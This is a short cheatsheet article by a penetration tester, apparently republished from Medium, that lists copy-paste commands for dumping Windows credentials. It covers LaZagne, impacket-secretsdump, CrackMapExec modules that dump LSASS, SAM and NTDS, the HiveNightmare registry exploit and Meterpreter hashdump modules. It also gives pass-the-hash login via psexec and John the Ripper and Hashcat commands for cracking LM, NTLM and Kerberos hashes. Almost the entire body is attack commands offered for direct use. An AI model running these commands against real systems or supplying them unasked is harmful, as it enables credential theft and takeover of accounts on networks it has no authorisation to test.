Windows — Credentials Dumping | by Karol Mazurek

Windows — Credentials Dumping

by Karol Mazurek 


INTRODUCTION

The article presents the current tools & techniques for Windows credential dumping. It will be very short and written in cheatsheet style. The main goal was to aggregate commands in one place, so you can just copy&paste them during the assessment. As a bonus to this short article, in the end, you will find the commands for cracking Windows hashes using John The Ripper and Hashcat.

  1. LaZagne
  2. Impacket
  3. CrackMapExec
  4. HiveNightmare (CVE-2021–36934)
  5. Meterpreter — credential_collector
  6. Meterpreter — smart_hashdump
  • Finding passwords for the most commonly-used software:
laZagne.exe all
findstr /si 'password' *.txt *.xml *.docx
impacket-secretsdump $domain/$user:[email protected]$ip
crackmapexec smb $ip -u $user -p $pass --sam
crackmapexec smb $ip -u $user -p $pass --lsa
crackmapexec smb $ip -u $user -p $pass --ntds
crackmapexec smb $ip -u $user -p $pass --ntds vss
crackmapexec smb $ip -u $user -p $pass -M lsassy
crackmapexec smb $ip -u $user -p $pass -M wireless
crackmapexec smb $ip -u $user -p $pass -M handlekatz
crackmapexec smb $ip -u $user -p $pass -M nanodump
crackmapexec smb $ip -u $user -p $pass -M procdump
crackmapexec smb $ip -u $user -p $pass --laps
crackmapexec smb $ip -u $user -p $pass -M gpp_password
gpp-decrypt $encrypted_password
migrate <id of lsass.exe>
run post/windows/gather/credentials/credential_collector
run post/windows/gather/smart_hashdump

Exploit allowing you to read any registry hives as non-admin.

.\HiveNightmare.exe
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local
impacket-psexec -hashes $hash [email protected]$ip
  • LM
john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt
john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt
john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt
john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 0 hash.txt
john --format=krb5tgs hash.txt --wordlist=rockyou.txt
hashcat -m 13100 -a 0 hash.txt rockyou.txt
john --format=krb5asrep hash.txt --wordlist=rockyou.txt
hashcat -m18200 hash.txt rockyou.txt

About the Author

Karol Mazurek - penetration tester.


The article was originally published at: https://karol-mazurek95.medium.com/windows-credentials-dumping-5898d896d048

April 4, 2022
Subscribe
Notify of
guest

0 Comments
Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013

Privacy Preference Center

Necessary

Cookies that are necessary for the site to function properly. This includes, storing the user's cookie consent state for the current domain, managing users carts to using the content network, Cloudflare, to identify trusted web traffic. See full Cookies declaration

gdpr, PYPF, woocommerce_cart_hash, woocommerce_items_in_cart, _wp_wocommerce_session, __cfduid [x2]

Performance

These are used to track user interaction and detect potential problems. These help us improve our services by providing analytical data on how users use this site.

_global_lucky_opt_out, _lo_np_, _lo_cid, _lo_uid, _lo_rid, _lo_v, __lotr
_ga, _gid, _gat, __utma, __utmt, __utmb, __utmc, __utmz
vuid

Marketing


tr, fr
ads/ga-audiences

CYBER MONDAY - everything 30% OFF
Use the code EFCYBER
x